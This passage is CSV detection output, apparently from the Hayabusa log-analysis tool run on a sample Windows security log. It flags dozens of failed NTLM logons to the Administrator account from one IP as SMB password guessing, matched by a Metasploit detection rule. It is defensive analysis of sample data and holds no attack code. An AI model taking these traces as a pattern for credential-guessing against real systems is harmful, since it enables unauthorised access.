Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 